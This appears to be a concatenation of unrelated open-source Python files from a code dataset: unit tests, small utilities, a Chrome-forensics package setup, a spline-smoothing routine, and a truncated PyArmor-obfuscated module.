# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import mock
from sdflexutils.redfish import main
from sdflexutils.redfish.resources.system import system
from sdflexutils.redfish.resources import update_service
from sushy import connector as sushy_connector
import testtools
class HPESushyTestCase(testtools.TestCase):
@mock.patch.object(sushy_connector, 'Connector', autospec=True)
def setUp(self, mock_connector):
super(HPESushyTestCase, self).setUp()
self.conn = mock.Mock()
mock_connector.return_value = self.conn
with open('sdflexutils/tests/unit/redfish/'
'json_samples/root.json', 'r') as f:
self.conn.get.return_value.json.return_value = (json.load(f))
self.hpe_sushy = main.HPESushy('https://1.2.3.4',
username='foo', password='bar',
verify=True)
mock_connector.assert_called_once_with(
'https://1.2.3.4', verify=True)
def test__init_throws_exception(self):
self.assertRaises(
ValueError, main.HPESushy, 'https://1.2.3.4',
'foo', 'bar', auth=mock.MagicMock())
@mock.patch.object(system, 'HPESystem', autospec=True)
def test_get_system(self, mock_system):
sys_inst = self.hpe_sushy.get_system('1234')
self.assertIsInstance(sys_inst,
system.HPESystem.__class__)
mock_system.assert_called_once_with(self.hpe_sushy._conn,
'1234',
self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ah(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = [
'Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ch(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = ['Oem',
'#SD.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
def test__get_action_list_ah(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ah.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll'])
def test__get_action_list_ch(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ch.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', '#SD.UpdateAll'])
| python |
"""
Tests for PyBryt annotations
"""
import time
import numpy as np
from collections.abc import Iterable
from functools import lru_cache
from pybryt import Value
from pybryt.utils import pickle_and_hash
START_TIMESTAMP = 1614904732.51892
@lru_cache(1)
def generate_memory_footprint():
"""
"""
np.random.seed(42)
return [
(np.random.uniform(-100, 100, size=(100, 100)), time.time()),
(4.0, time.time()),
(list(range(100))[::-1], time.time()),
(1, time.time()),
(np.e, time.time()),
(None, time.time()),
(None, time.time()),
(np.random.normal(size=102), time.time()),
(4.0, time.time()),
]
def test_value_annotation():
"""
"""
mfp = generate_memory_footprint()
seen = {}
for val, ts in mfp:
v = Value(val)
res = v.check(mfp)
h = pickle_and_hash(val)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is True, "Did not find value in memory footprint"
assert res._satisfied is True, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
if h in seen:
# check that we get the earliest timestamp for duplicate values
assert np.isclose(res.timestamp, seen[h]), \
"Wrong timestamp for duplicate value in value annotation result"
else:
assert np.isclose(res.timestamp, ts), "Wrong timestamp in value annotation result"
if isinstance(val, Iterable) and hasattr(val, "all"): # for numpy arrays
assert (res.value == val).all(), "Wrong value in value annotation result"
else:
assert res.value == val, "Wrong value in value annotation result"
if h not in seen:
seen[h] = ts
v = Value(-1) # does not occur in mfp
res = v.check(mfp)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is False, "Did not find value in memory footprint"
assert res._satisfied is False, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
assert res.timestamp == -1, "Wrong timestamp in value annotation result"
assert res.value is None, "Wrong value in value annotation result"
| python |
""" Exteneral Device Specifications Sub-package """
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
from .devcore import *
from . import ibmq_burlington
from . import ibmq_essex
from . import ibmq_london
from . import ibmq_melbourne
from . import ibmq_ourense
from . import ibmq_rueschlikon
from . import ibmq_tenerife
from . import ibmq_vigo
from . import ibmq_yorktown
from . import rigetti_agave
from . import rigetti_aspen4
from . import rigetti_aspen6
from . import rigetti_aspen7
| python |
# -*- coding: utf-8 -*-
"""The Software is provided to you by the Licensor under the License, as
defined below, subject to the following condition.
Without limiting other conditions in the License, the grant of rights under
the License will not include, and the License does not grant to you, the
right to Sell the Software.
For purposes of the foregoing, “Sell” means practicing any or all of the
rights granted to you under the License to provide to third parties, for a
fee or other consideration (including without limitation fees for hosting
or consulting/ support services related to the Software), a product or
service whose value derives, entirely or substantially, from the
functionality of the Software. Any license notice or attribution required
by the License must also include this Commons Clause License Condition
notice.
Software: WAVE Observation Framework
License: Apache 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt
Licensor: Consumer Technology Association
Contributor: Eurofins Digital Product Testing UK Limited
""" | python |
import os
import json
pathToFolder = "c:/Users/dilGoe/Desktop/Praktikum/django"
pathToFile = "c:/Users/dilGoe/Desktop/Praktikum/django/LICENSE"
def getCorpusFolder(pathToFolder=pathToFolder):
resultDictJSON = {}
for (dirpath, dirname, filename) in os.walk(pathToFolder):
for file in filename:
filePath = os.path.join(dirpath, file)
file1 = open(filePath, "rb")
file2 = file1.read().decode('utf-8', errors='replace').splitlines()
resultDictJSON[filePath] = []
for content in file2:
resultDictJSON[filePath].append(content)
return resultDictJSON
def getCorpusOneFile(filepath=pathToFile):
resultList = []
file1 = open(filepath, "rb")
file2 = file1.read().decode('utf-8', errors='replace').splitlines()
for content in file2:
if content:
resultList.append(content)
content = file1.readline().decode('utf-8', errors='replace')
return resultList
def main():
print(getCorpusOneFile())
if __name__ == "__main__":
main() | python |
"""Approval race condition mitigation."""
from web3.contract import Contract
def test_increase_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Increase approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).addApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount + change
def test_decrease_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Decrease approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).subApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount - change
| python |
import unittest
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class MonolithicTest(unittest.TestCase):
def _steps(self):
for name in dir(self):
if name.startswith("step"):
yield name, getattr(self, name)
def assertBrowserTitle(self, expected):
self.assertIn(expected, self.browser.title.lower())
def assertCurrentUrl(self, expected):
self.assertIn(expected, self.browser.current_url.lower())
def assertElementText(self, expected, element):
self.assertIn(expected.lower(), element.text.lower())
def clearInputField(self, element):
while element.get_attribute('value') != '':
element.send_keys(Keys.BACKSPACE)
def xpath_string_escape(self, input_str):
""" creates a concatenation of alternately-quoted strings that is always a valid XPath expression """
parts = input_str.split("'")
return "concat('" + "', \"'\" , '".join(parts) + "', '')"
def login(self):
self.browser.get(self.domain+'login')
self.email = self.browser.find_element_by_name("email")
self.password = self.browser.find_element_by_name("password")
self.signin = self.browser.find_element_by_xpath(
"//button[.='Sign In']")
self.email.send_keys(self.correct_email)
self.password.send_keys(self.correct_password)
self.signin.click()
time.sleep(5)
self.assertCurrentUrl(self.domain+'admin/dashboard')
def logout(self):
iconbutton = self.browser.find_element_by_xpath(
'//button[@class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit"]')
iconbutton.click()
time.sleep(1)
logoutbutton = self.browser.find_element_by_xpath(
'//li[@role="menuitem"][@tabindex="0"]')
logoutbutton.click()
time.sleep(2)
self.assertCurrentUrl(self.domain+'login')
def assertPanelLocked(self, button_id, is_locked):
locked = True
button = self.browser.find_element_by_id(button_id)
button.click()
time.sleep(1)
self.browser.switch_to.frame(
self.browser.find_element_by_id('content-iframe')
)
try:
# If error then Error element does not exist -> Unlocked
self.browser.find_element_by_id("unverified_text")
except:
locked = False
self.browser.switch_to.default_content()
self.assertEqual(is_locked, locked)
def test_steps(self):
print()
for name, step in self._steps():
try:
test_name = " ".join(name.split('_')[2:])
print("Running test: {}".format(test_name))
step()
time.sleep(1)
except Exception as e:
self.fail("{} failed ({}: {})".format(step, type(e), e))
def setUp(self):
# for linux
# self.browser = webdriver.Chrome()
# for Windows specify the path
self.browser = webdriver.Chrome('C:/chromedriver.exe')
self.domain = 'https://openinventoryorg.github.io/web-frontend/#/'
# change email, password to valid email,pwds of the system
self.correct_email = '[email protected]'
self.correct_password = 'password'
self.browser.maximize_window()
time.sleep(1)
self.addCleanup(self.browser.quit)
| python |
import json
from .measurementGroup import MeasurementGroup
from .measurementItem import MeasurementItem
from .codeSequences import CodeSequence
class MeasurementReport(object):
"""
Data structure plus convenience methods to create measurment reports following
the required format to be processed by the DCMQI tid1500writer tool (using the
JSON export of this).
"""
def __init__(self, seriesNumber, compositeContext, dicomSourceFileList, timePoint,
seriesDescription = "Measurements", procedureReported = None):
self.SeriesDescription = str(seriesDescription)
self.SeriesNumber = str(seriesNumber)
self.InstanceNumber = "1"
self.compositeContext = [compositeContext]
self.imageLibrary = dicomSourceFileList
self.observerContext = {
"ObserverType": "PERSON",
"PersonObserverName": "Reader01"
}
if procedureReported:
self.procedureReported = procedureReported
self.VerificationFlag = "VERIFIED"
self.CompletionFlag = "COMPLETE"
self.activitySession = "1"
self.timePoint = str(timePoint)
self.Measurements = []
def addMeasurementGroup(self, measurementGroup):
self.Measurements.append(measurementGroup)
def exportToJson(self, fileName):
with open(fileName, 'w') as fp:
json.dump(self._getAsDict(), fp, indent = 2)
def getJsonStr(self):
return json.dumps(self._getAsDict(), indent = 2)
def _getAsDict(self):
# This is a bit of a hack to get the "@schema" in there, didn't figure out how to
# do this otherwise with json.dumps. If this wasn't needed I could just dump
# the json directly with my custom encoder.
jsonStr = json.dumps(self, indent = 2, cls = self._MyJSONEncoder)
tempDict = json.loads(jsonStr)
outDict = {}
outDict["@schema"] = "https://raw.githubusercontent.com/qiicr/dcmqi/master/doc/schemas/sr-tid1500-schema.json#"
outDict.update(tempDict)
return outDict
# Inner private class to define a custom JSON encoder for serializing MeasurmentReport
class _MyJSONEncoder(json.JSONEncoder):
def default(self, obj):
if (isinstance(obj, MeasurementReport) or
isinstance(obj, MeasurementGroup) or
isinstance(obj, MeasurementItem) or
isinstance(obj, CodeSequence)):
return obj.__dict__
else:
return super(MyEncoder, self).default(obj) | python |
from setuptools import setup, find_packages
setup(
name='pyhindsight',
packages=find_packages(),
include_package_data=True,
scripts=['hindsight.py', 'hindsight_gui.py'],
version='2.0.4',
description='Internet history forensics for Google Chrome/Chromium',
url='https://github.com/obsidianforensics/hindsight',
author='Ryan Benson',
author_email='[email protected]',
license='Apache',
keywords=['chrome', 'forensics'],
classifiers=[],
install_requires=[
'keyring>=9.0',
'pytz>=2016.4',
'pycryptodomex>=3.4.3',
'xlsxwriter>=0.8.4',
# 'pypiwin32>=219',
'bottle>=0.12.9'
]
)
| python |
from bs4 import BeautifulSoup
import requests
import re
# function to get all the policy urls from a website
def collect_url_links(url_link) -> list:
url_list = []
pattern = re.compile(r'^http')
source = requests.get(url_link).text
soup = BeautifulSoup(source, 'lxml')
a_tag = soup.find_all("a") # Gives you the list of all the a tags
for i in a_tag:
if i.text in ["Privacy", "Terms", "Privacy Policy", "Terms of Service"]:
url = i["href"]
url_list.append(url)
for i in range(len(url_list)):
matches = pattern.finditer(url_list[i])
if(not (any(True for _ in matches))):
url_list[i] = url_link + url_list[i][1:]
return url_list
| python |
def diamond(n):
"""Display a diamond made of *.
Args:
n: (int) Amount of *s in the middle row.
Returns:
Diamond shaped text. None if input n is invalid.
"""
if n <= 0 or n % 2 == 0:
return None
offset = int((n - 1)/2)
# for i in range(offset + 1):
# shape = shape + " "*(offset - i) + "*"*(1 + i*2) + "\n"
shape = [(" "*(offset - i) + "*"*(1 + i*2) + "\n") for i in range(offset + 1)]
shape = shape + shape[-2::-1]
return ''.join(shape)
print(diamond(29))
print(' *\n ***\n *****\n *******\n*********\n *******\n *****\n'
' ***\n *\n')
# __*__
# _***
# *****
# _***_
# __*__
| python |
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 04 20:05:13 2015
Translation of octave code for CSAPS.
@author: Kevin
"""
import numpy as np
import scipy as sp
from scipy import interpolate
from scipy.sparse import linalg
def csaps(x, y, p, xi=[], w=[]):
# sort the inputs by ordering of x
ii = np.argsort(x)
x = np.array(x)
y = np.array(y)
x = x.take(ii)
y = y.take(ii)
h = np.diff(x)
n = np.size(x)
if np.size(w) == 0:
w = np.ones([n, 1])
R = sp.sparse.spdiags(np.array([h[0:-1],
2.*(h[0:-1] + h[1:]),
h[1:]]), [-1, 0, 1], n-2, n-2)
QT = sp.sparse.spdiags(np.array([1. / h[0:-1],
-(1. / h[0:-1] + 1. / h[1:]),
1. / h[1:]]), [0, -1, -2], n, n-2).transpose()
# solve for the scaled second derivatives u and
# for the function values a at the knots (if p = 1, a = y)
v = 6*(1-p)*QT.dot(sp.sparse.spdiags(1. / w.flatten(), 0, len(w), len(w))).dot(QT.T) + p*R
u = linalg.spsolve(v, QT.dot(y))
a = y - 6*(1-p)*sp.sparse.spdiags(1. / w.flatten(), 0, len(w), len(w)).dot(QT.T).dot(u)
# derivatives at all but the last knot for the piecewise cubic spline
aa = a[0:-1]
cc = np.zeros(y.shape)
cc[1:n-1] = 6 * p * u
dd = np.diff(cc) / h
cc = cc[0:-1]
bb = np.diff(a) / h - cc / 2 * h - dd / 6 * h ** 2
# shape coefficients and create piece-wise polynomial
coefs = np.concatenate((dd.reshape((1, dd.size)) / 6,
cc.reshape((1, cc.size)) / 2,
bb.reshape((1, bb.size)),
aa.reshape((1, aa.size))))
ret = interpolate.interpolate.PPoly(coefs, x)
# check if we should evaluate the smoothing spline
xi = np.array(xi)
if xi.size != 0:
ret = ret(xi)
return ret
| python |
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x08\x2d\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x36\x1e\x00\x00\x00\x00\x00\x10\x12\xd8\xc1\xe3\xd7\xa8\xd7\xd4\xb7\xb9\xae\x4c\x5b\x3c\xd7\x05\x00\x00\x00\x00\x00\x00\x00\x00\x78\x44\x98\xc9\x9e\xe4\x19\xda\x18\x49\xb4\x1f\x08\x1c\x04\x48\x96\xca\x2b\x13\xf8\xcc\x26\x93\x1a\xc0\x0e\xe9\xf7\xd9\xe7\x78\x18\x90\xef\x22\xfb\x75\x41\xa3\x8a\xb0\xfa\x3d\x68\x57\xc7\xe1\xc4\x71\x3f\x9b\x1f\x79\xbd\x0e\x99\x05\x5e\xcc\xdb\x26\x0e\x3e\xbe\x27\x05\x66\xdd\xad\x17\xba\x93\x64\xa9\xcc\x34\xae\xf6\xda\x66\x4c\x92\x09\x2f\x6c\x33\xe4\x8c\xa4\x94\x75\x12\x22\x4a\xb7\x31\x35\xad\x66\x04\xec\xfa\x5b\xad\x22\xc6\x04\xff\x01\xb7\x9e\xdd\x7b\xde\x56\x44\x99\x5d\x0c\xc5\x0b\xf1\x03\x18\x69\x59\xdc\x05\xc2\x49\xee\x74\x74\xc9\xcc\x0b\x2a\x2c\xee\xaa\xaf\xac\x6d\x2c\x1f\x19\x65\xe9\x3a\x93\xe2\xfa\x6e\x75\xb8\x5c\xdf\x1b\xad\x2d\xed\x64\x38\xb5\x97\x46\xc3\xf4\x99\x9a\xce\xc9\x83\x8a\x70\x52\xc2\xe4\x26\x84\xe4\x20\x90\x5f\x2a\xd4\x7e\x90\xf7\x33\xa3\x3f\x86\xe8\xcd\x94\xab\x1e\x73\xcc\xf9\xef\xda\x69\xac\x10\x95\x25\xc7\xa3\x33\x17\xb5\xb4\x78\xea\xcd\xc0\x68\x88\xd8\xbb\xf6\x25\xc3\x89\xd1\xae\xbe\x2b\x98\x69\x07\xb5\x72\x01\xbf\x12\x15\xf4\x73\x7e\x59\x1b\xa0\x40\x1a\x09\x27\x6d\xac\x71\xe0\x73\x35\xa3\x28\x2d\x25\x4c\x6e\x69\x0d\x7c\xbb\xfb\x11\x80\xb8\xd7\x5a\xd0\x98\x3c\x79\x09\x3d\xb4\x3e\x4b\x08\x4a\x66\xb7\xdb\xe5\xa0\x2f\x48\x1b\x25\x7a\xf6\xe7\xde\x0a\xdd\x33\xd5\xe4\x93\x19\x7b\x9e\x5f\xd5\xee\x76\x89\x3e\x33\x5c\xfc\x88\x0e\x9d\xef\x4b\x66\x98\xa0\x2f\x70\x22\x8c\x43\x1d\xc0\x3a\x49\x79\xfe\x82\xd9\x2a\xa4\xcc\x3c\xb2\x8c\x54\x0b\xae\xb4\x8f\x25\x49\x3f\x9a\xcc\x7b\xbd\xaa\xc2\xf2\x38\xc6\xb1\xd5\x55\xe7\x23\x07\x88\x97\xa1\xe4\xaf\x68\x7e\xf5\x0a\x95\xca\xa7\xcd\x65\x17\x65\xaf\xf4\xc8\x2b\x33\x42\x5e\x5a\x68\x0c\xa2\xed\xd7\x4d\xd2\x62\x8c\x1f\x2f\x30\x17\xdf\x37\x16\x74\x37\x2c\x41\x19\xf0\xf4\x9d\xc4\x6c\x7a\x68\xc0\x40\x5a\x85\xce\x6c\xa4\xf1\xdf\xc4\x74\xd0\x88\xd6\x0a\x47\xa5\x68\x53\x35\x5a\xc8\xab\xf3\x48\xc1\x8c\x82\xc3\x5e\xd3\x7c\x5e\x0e\xe2\x3a\x99\x49\x04\x5a\x95\x49\x38\x46\xeb\xf8\x4f\x98\x67\x9f\x4d\xcd\x20\xb3\xb1\x10\x51\x2e\xca\x29\xc9\x4a\x1a\x5e\x3d\x5b\xdc\xac\x37\x35\x56\x12\x99\x5e\x0b\x32\x28\x09\x10\xe4\xa8\xa3\xfc\xfb\xdc\x33\xba\x1c\x7f\xae\x11\x7c\xfc\xb6\xcb\xe2\x6a\x6b\x33\x58\xff\x30\x40\xe9\xa3\x87\xcd\xef\x72\x1b\x64\x3d\xbd\x0e\x1e\x22\x4d\x87\x20\xbe\x43\x8d\xa5\x6d\x6f\x1b\xdb\xd9\x47\x66\x10\xa9\x10\x51\x37\x60\xeb\xca\x89\xe1\x80\x36\x82\x01\x27\x18\x44\x56\x80\xb3\x65\xca\xbc\xd6\x9d\x32\xe2\x14\x60\xc2\xa2\xef\xff\xf5\x4e\xee\x36\xf0\x5f\x60\x58\x27\x4c\x57\x44\xc3\x91\xdc\x84\x22\x93\x22\x14\x2e\x61\xf1\x3c\x5a\x4e\xda\x74\x22\x03\xac\x00\xbe\xd1\x21\xd0\x26\x9d\xfa\xf1\x83\xbc\x06\xbf\xf6\x61\xc7\xf7\x98\xaf\x98\xb7\x9f\x1e\x73\xd9\xf7\xd9\xe5\x94\x9f\x48\xd2\xf0\x6b\x69\x5d\x4f\x9a\xa4\x4b\xc2\x90\x14\x90\x59\xae\x97\x30\xc6\xfd\x28\x44\x42\x49\x92\x6d\x0a\x8d\x27\x07\x48\xe4\x0b\xa8\x60\x95\xd0\x09\xc3\x05\xf3\xb4\xb8\xb3\xb1\x50\xce\x35\xfa\x20\x12\x47\xcd\x63\x0a\x4a\xde\x01\x76\xc7\xed\x3a\x5c\x3e\x84\x4f\x2b\xec\xe6\xef\x96\x3f\x0a\x1e\x5a\x1b\x53\xa3\xa9\xf4\xdc\x44\x9d\x5d\x7b\xf8\xfa\xc5\xaf\x6e\xd4\x7a\x38\xb1\x03\x48\xd4\xe7\xd2\xaf\x19\xed\x9c\x77\xc2\x04\x8e\x18\x1f\x76\xc3\xe7\xb3\x18\x33\x81\xc2\x16\xb8\x8a\x43\x3c\x6a\xd7\x8a\x59\x1a\x35\xaf\x02\x7f\x95\x73\xfe\x3e\x5e\xf5\xdb\xae\x61\xaf\x6a\xb5\xe8\x2b\xea\xc0\xf9\xc5\x20\x3f\x49\x50\x2e\xc7\x90\xc9\x21\x8f\x14\x1b\xdc\xc7\x26\xf8\x59\xa1\x0b\x80\x6e\x79\xc9\xde\x40\x23\xa7\xcb\x30\x1c\xc3\xc6\x61\xa4\xec\xfb\x92\xa6\xa7\xd8\x31\xe5\xb2\x96\x72\x01\xe2\xd1\xd3\xfd\xa9\x90\x9d\x5c\x5a\x61\x0c\xdb\x15\xf8\x61\x95\x5a\x00\xd9\x0c\xb4\xed\xa1\x9e\x3c\xd3\x63\x72\x7a\x30\x5e\x4c\x64\xd9\x76\x63\x3d\x74\xbb\xe5\x66\x7b\xf4\x30\x48\x44\x34\xaa\xe0\x18\xec\x6f\xe6\x3b\x29\x52\xcd\xd4\x95\xa0\xc3\x03\xe3\xc6\x9c\xab\x11\x26\x30\x3d\x75\xee\x89\x1d\xd2\x83\x1e\xdb\xf1\x2b\x33\x98\x51\xca\x48\xc7\x67\x65\x57\x0a\x67\xf3\x11\xec\x36\x0f\x30\x21\x0d\x18\x55\x25\x88\xcb\x32\x2f\x72\xb6\x6e\x19\x98\x5d\xd0\x60\xc4\x52\x8c\xa0\x16\x7e\x03\x7d\x61\xd4\x10\xef\x5d\x16\x3b\xbc\xe4\x6c\x33\x00\xbc\x6f\xb8\x9e\x6a\xbf\x5f\x1b\x67\x73\xe0\x76\x34\x19\x28\x69\xa6\x2c\x00\xb8\x8c\x6b\x4d\x5f\xd7\xec\xbf\x2f\xf7\x4c\x11\xcd\x88\x17\x29\xaa\xcb\x2b\x1f\xac\x48\x4e\x1d\xc6\xa8\xd3\x51\x1e\x64\xe7\xa1\x32\x78\x7f\x21\x25\x52\x32\xcb\x31\x5f\xef\xf3\x72\xe5\xb9\x90\x9a\xb1\x45\x9d\x9c\xdb\xb2\xcc\xa4\x0e\xd4\x57\xd0\x81\xbd\x5b\xc9\x69\x18\xe5\x77\x02\x78\x6c\x52\xca\xce\x87\x35\xce\x62\x6c\xd7\x09\x37\x3b\x5e\xfa\x91\x8d\xbe\xae\xc9\x86\xd0\xc2\x4c\x88\xab\x2a\x38\xfe\x0b\xfd\x35\xa2\x3a\xff\x5d\x84\x9f\x4c\xde\x50\x32\x86\x2a\xe7\x89\x54\xf7\xb9\x5b\xc0\x78\xf7\x4f\x22\x36\x3a\xa3\xa7\x21\x14\x56\x21\x01\x4b\xfc\xd5\xbf\x1c\xc2\x1f\x9d\x8a\x16\x61\x6a\x55\x39\xff\x97\x9b\xb4\x18\xf9\xed\xdc\x2c\x23\x1f\x04\xef\x00\x82\x0a\x14\xfb\x92\x55\x7c\xab\x4b\x6c\xc1\x15\xbd\xb6\xf7\x70\x16\x02\xb6\x31\x7c\x6f\xb1\xfe\x2e\xff\xf9\x1c\x0e\x43\x04\x3d\xee\xf1\x06\x84\x01\x44\x67\xcc\x99\xa5\xf5\x7b\xe8\xe3\x80\x88\xb6\x04\x54\x3e\xca\x3c\x8a\xb6\x3c\xad\x9c\x2f\x88\x9f\x77\x71\xc3\x91\xe2\x97\x17\xc2\xd2\x6a\xb8\x56\x93\x26\xe8\x7a\x69\xc2\xa9\xf7\x14\xdf\xe8\x1a\x87\xf4\x65\x72\x16\x5f\x6e\xa3\xf5\x3d\x8a\xd1\x02\xc1\xba\x25\xcd\xa5\x85\xb3\x91\x91\xe4\x26\x3e\x52\x04\xfb\x49\x4c\xe7\x32\xee\xc9\xde\x21\x75\x7f\xba\xd9\x0a\xec\xa9\xc1\xe6\xd0\xac\x36\x3f\xe9\x5f\x26\xd0\xc4\x28\x76\x20\x4e\x7c\x7b\xec\xc4\x29\xb4\xa1\xbc\x17\xbd\x92\x7a\x89\x05\xef\x83\xbd\x6b\x38\x57\x23\xb6\x8e\xd3\x96\xba\x70\x5b\x68\xc2\x76\x20\xa8\xf1\x45\xaa\xde\x12\xad\x48\xa6\x6a\x68\x6f\x4a\xc0\x85\x27\xf1\x34\x76\x5c\xcd\xb3\xd5\x7d\x31\x8e\xb8\x88\x60\x6f\x0e\x14\x18\x26\xc2\x58\xb1\x0d\xa5\xb7\x55\x0d\xf8\x44\xc7\xf3\x0b\x71\x93\x4f\x19\xf3\x04\x68\xc6\xa8\x51\x8f\x3d\xb8\x45\x71\x8a\xd2\xce\x1a\x60\x60\xa4\x1d\x87\xb9\x30\x98\x3d\x7b\x3d\xd0\x2a\x0c\x9c\xdb\x73\xd0\x7a\x30\x91\x7c\x2c\x85\x57\x41\x43\x64\x87\xe1\xf4\xc0\x74\xb0\x92\xea\xbc\x55\xaf\xfc\xd0\xcd\xb6\xb2\xb8\x1a\xc9\x6c\x2f\xe2\xe7\x50\x63\x01\x93\xc4\x62\x6c\x2e\x22\x25\x03\xdd\xf2\xb5\xe4\x6c\x84\x85\x05\x47\x92\x5a\xe1\xbe\x3f\xf8\x35\xc8\x54\x24\x31\xb6\xc8\xa3\xb6\xb9\xca\x60\x3d\xcf\xcb\xfa\x42\xea\xef\x42\xd9\x31\x4e\xc3\x64\xfe\x77\x5b\x65\xe8\xfe\xb9\xf7\xad\xc4\x11\x68\x4f\x1e\x4f\x10\xac\xd0\x90\xf8\x7c\x89\xfa\x82\x71\xce\xea\xd8\x19\x28\x43\xb0\xd4\x7b\x3b\xdf\x6e\x4a\x33\xab\x83\xa1\xf0\x04\xc8\xc5\xfa\x21\xb1\x7e\xfc\xdb\x0b\x90\xeb\x9e\xc1\xf6\x7e\xd1\x93\x54\xf4\x76\x45\x11\xb7\x96\x73\x47\xa5\x13\xce\xe3\x37\x12\x80\x17\x88\xf1\xe8\x69\x09\xbc\x58\x58\x69\x1c\xc5\x91\xed\x99\xce\x05\x5a\x42\x3a\xb3\x07\x14\x11\x1c\x23\x5f\xb7\xd7\x98\x2d\xee\x53\x19\xc1\xd9\x21\xe6\x69\x69\xee\xc6\xe2\xa7\x2d\xf8\x97\x00\x1e\xee\x3c\x69\x6e\x67\x54\x74\x84\x17\x62\x40\x3e\x14\xaf\x32\x24\xe4\x89\x87\x8d\xa8\x75\xdf\xdb\x00\x25\x46\x9f\x2f\xa6\xf6\xf0\x46\x52\x65\x47\xcf\x1f\x0a\xea\x73\x32\x67\x69\xcf\xb3\x39\x17\x19\xda\xf2\xf9\x1b\xd3\x87\x2b\x54\x4e\x96\x1b\xfe\x7e\xdc\xfe\x90\x97\x6d\x21\xb8\x3b\x64\xcc\xc1\x5e\xb9\x14\xad\x82\x00\xba\xd8\x4b\x9f\x5a\x64\x7f\xb7\xe6\x7f\xdc\xf2\x0b\x9f\x8b\x8e\x1c\x3d\xf9\x22\x8b\x80\x82\x84\x8f\xa0\xc8\x60\x8a\x6c\x1b\xd6\xff\xcb\x8f\x71\x93\x87\xe8\x2e\x39\xd7\xbb\x9f\x57\x5f\xf5\x41\x72\x86\x1d\xe5\xe0\xab\xaa\x90\x49\x21\x62\x2e\x76\x78\xbd\x71\x09\xdb\x28\x88\x78\x24\x35\x21\xfc\xc0\x90\x86\xa3\x89\x88\x9b\xae\x22\x2f\xbc\x42\x41\x15\x91\x22\x69\xd4\x96\x19\xa8\xa2\x98\x34\x35\x40\x84\x43\x27\x46\x71\x25\x53\xcb\x1b\x63\x09\xe8\x46\x29\x70\x36\x09\x00\x75\xf8\xd5\xad\xaa\xb1\x10\xcb\x89\x9f\x88\x91\x41\x50\x2a\x1f\x0b\xed\x4b\x6a\xee\x8b\x21\xbc\xc8\x9c\x6d\xe3\x0f\x74\xee\xc6\x9a\x69\x05\x68\xda\x72\x09\xc1\x5b\x31\x82\x92\x7b\x4f\x6d\x66\xb1\xe2\xb5\x0b\x1a\x8a\x1a\x99\x5c\x28\x44\x44\x71\x7d\xcc\x2f\xd5\x5b\xfc\xcc\xe4\x7f\x20\x7b\xb6\xf4\x58\x34\xa2\x8b\x86\x68\xd6\xe5\x96\x12\x39\x7a\x15\x7a\xc4\x9e\x57\x5f\x4f\x39\xfd\xe1\xff\x99\xd4\x81\xd1\x5f\xe4\xeb\x60\xd4\x34\x9e\xff\x59\x42\x55\x86\xd8\x5b\x18\x6a\x4d\x3a\x81\x77\xad\x59\x9f\xed\xd6\x52\x13\x25\x63\x21\xd5\x29\x16\xe3\xfb\x82\x9b\x15\x8f\xf4\xb3\xc6\xfd\xcb\x83\x91\x44\xaa\x9d\x2e\x98\x57\x86\x37\xb1\x82\x83\xc7\x49\x67\x87\x66\x29\